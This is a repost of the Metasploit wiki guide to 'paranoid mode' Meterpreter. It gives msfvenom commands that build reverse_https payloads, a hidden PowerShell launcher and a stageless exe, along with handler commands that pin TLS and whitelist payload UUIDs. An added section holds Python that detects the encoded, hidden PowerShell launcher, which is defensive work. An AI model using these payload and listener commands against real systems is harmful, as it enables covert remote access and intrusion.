Meterpreter Paranoid Mode https(SSL)
Source: Internet | Published: linux socket dependency libraries | Editor: 程序博客网 | Time: 2024/05/18 00:41
In some scenarios, it pays to be paranoid. This also applies to generating and handling Meterpreter sessions. This document walks through the process of implementing a paranoid Meterpreter payload and listener.
Create an SSL/TLS Certificate
For best results, use an SSL/TLS certificate signed by a trusted certificate authority. Failing that, you can still generate a self-signed unified PEM (private key and certificate concatenated into one file) with the following command:
$ openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
    -subj "/C=US/ST=Texas/L=Austin/O=Development/CN=www.example.com" \
    -keyout www.example.com.key \
    -out www.example.com.crt && \
  cat www.example.com.key www.example.com.crt > www.example.com.pem && \
  rm -f www.example.com.key www.example.com.crt
Create a Paranoid Payload
For this use case, we will combine Payload UUID tracking and whitelisting with TLS pinning. For a staged payload, we will use the following command:
$ ./msfvenom -p windows/meterpreter/reverse_https LHOST=www.example.com LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./www.example.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o launch-paranoid.bat
$ head launch-paranoid.bat
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcg...
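Added detection example, not part of the Metasploit wiki page: the launcher head above is cmd's start /b /min wrapping powershell.exe -nop -w hidden -e, and its visible base64 prefix aQBmACgAWwBJAG4AdABQAHQAcg decodes as UTF-16LE to if([IntPtr. The script scores process command lines for those traits over constructed sample log entries; the full prelude string if([IntPtr]::Size -eq 4) is assumed from the standard msfvenom psh template, and the script it encodes is a harmless stand-in, not a stager.

```python
import base64
import re
from typing import List, Optional

# Launcher shape from the head of launch-paranoid.bat: cmd 'start /b /min', then
# powershell.exe -nop -w hidden -e <base64>. PowerShell accepts abbreviated and
# reordered flags, so each trait is matched on its own.
ENCODED_RE = re.compile(r"powershell(?:\.exe)?\b.*?\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I)
NOPROFILE_RE = re.compile(r"\s-nop(?:rofile)?\b", re.I)
START_MIN_RE = re.compile(r"\bstart\s+/b\s+/min\b", re.I)
# The page's prefix aQBmACgAWwBJAG4AdABQAHQAcg decodes to "if([IntPtr"; the full
# 32-bit check below is assumed from msfvenom's psh template.
STAGER_PRELUDE = "if([IntPtr]::Size -eq 4)"


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries base64 of the UTF-16LE script text, not UTF-8."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # bad alphabet, padding or odd length
        return None


def analyze_command_line(cmdline: str) -> dict:
    """Score one process command line; 'score' is the number of launcher traits seen."""
    indicators: List[str] = []
    decoded = None
    m = ENCODED_RE.search(cmdline)
    if m:
        indicators.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
        if decoded is not None and STAGER_PRELUDE in decoded:
            indicators.append("msf_psh_prelude")
    for name, rx in (("hidden_window", HIDDEN_RE), ("no_profile", NOPROFILE_RE),
                     ("start_minimized", START_MIN_RE)):
        if rx.search(cmdline):
            indicators.append(name)
    return {"indicators": indicators, "score": len(indicators), "decoded": decoded}


# Constructed sample log: a harmless stand-in script encoded the way -e expects,
# plus an ordinary admin invocation that should score low.
SAMPLE_SCRIPT = "if([IntPtr]::Size -eq 4){'32-bit'}else{'64-bit'}"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = [
    "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e " + SAMPLE_B64,
    "powershell.exe -NoProfile -Command Get-Process",
]


def scan_log(lines: List[str]) -> List[dict]:
    """Return an entry for every line that fires at least one indicator."""
    hits = []
    for line in lines:
        result = analyze_command_line(line)
        if result["score"]:
            hits.append(dict(line=line, **result))
    return hits
```

Running scan_log(SAMPLE_LOG) scores the launcher line 5 (all traits plus the decoded prelude) and the Get-Process line 1, so alerting on a threshold rather than on any single flag keeps routine -NoProfile use from paging anyone.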
A stageless version of this would look like the following:
$ ./msfvenom -p windows/meterpreter_reverse_https LHOST=www.example.com LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./www.example.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedStageless -f exe -o launch-paranoid-stageless.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 885314 bytes
Saved as: launch-paranoid-stageless.exe
Create a Paranoid Listener
The handler for a staged payload needs the HandlerSSLCert and StagerVerifySSLCert options set to enable TLS pinning, and IgnoreUnknownPayloads set so that only registered payload UUIDs are accepted (whitelisted):
$ ./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_https; set LHOST www.example.com; set LPORT 443; set HandlerSSLCert ./www.example.com.pem; set IgnoreUnknownPayloads true; set StagerVerifySSLCert true; run -j'
A stageless version is only slightly different:
$ ./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter_reverse_https; set LHOST www.example.com; set LPORT 443; set HandlerSSLCert ./www.example.com.pem; set IgnoreUnknownPayloads true; set StagerVerifySSLCert true; run -j'
#from https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode